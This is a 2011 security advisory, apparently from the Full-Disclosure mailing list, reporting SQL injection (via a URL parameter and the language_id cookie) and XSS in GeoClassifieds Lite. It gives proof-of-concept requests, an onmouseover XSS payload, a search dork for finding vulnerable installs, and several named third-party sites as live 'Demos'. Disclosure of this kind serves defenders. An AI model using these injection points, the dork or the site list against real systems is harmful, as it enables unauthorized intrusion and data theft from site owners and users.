--------------------------------------------------------------------- [+] Title : GeoClassifieds Lite Multiple vulnerabilities [+] Affected Version : v2.0.1 & V2.0.3.1 & V2.0.3.2 &V2.0.4 [+] Software Link : http://geodesicsolutions.com/ [+] Tested on : Windows 7 [+] Date : 25/08/2011 [+] Dork : "inurl:/admin/ Classifieds and Auctions Software by Geodesic Solutions" [+] Category : Webapps [+] Severity : High to Medium [+] Author : Yassin Aboukir <01Xp01|At|Gmail.com> [+] Site : http://www.Yaboukir.Com ---------------------------------------------------------------------- [+] About the Software: [ Purchased Price: $399 USD - $799 USD] Geo Classifieds Premier gives you all the options of the Basic classifieds software edition, plus additional flexibility and powerful functionality. It allows you to create multiple user groups and multiple pricing plans, and is built to suit the most complicated E-Commerce needs. [+] How That can be Exploited : ### V2.0.1 : Suffer from SQL Injection and Cross site scripting (Xss) vulnerability. 1- SQL Injection (High) : http://Localhost/?a=19&c=id [SQL Attack] 2- Cookies Based SQL Injection (High) : # Read More About The Attack : http://www.Yaboukir.com/cookie-based-sql-injection/ The idea of the PoC is to Intercept the HTTP request sent to the vulnerable Website using a Web Proxy (WebScarab for example or just Tamper Data Firefox Add-on) then and modify The Cookie variable language_id . GET HTTP/1.1 Host: localhost.com Connection: keep-alive Cookie: language_id=1[SQL attack] 3- Cross Site Scripting (Medium) : The same thing with the Xss Vulnerability, all you have is to modify the HTTP request . GET HTTP/1.1 Host: localhost.com Connection: keep-alive Cookie: Demos: http://classified4u.biz/ http://www.freeclassifieds.aapkakolkata.com/ ### V2.0.3.1 & V2.0.3.2 & V2.0.4 : Suffer from Cross site scripting (Xss). 1- Cross Site Scripting (Medium) : http://Localhost/index.php?a=19&c= http://Localhost/?a=19&c="+onmouseover=alert('Xssed-By-Yassin')+ Demos: http://www.tescal.com/ads/ http://www.216ads.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/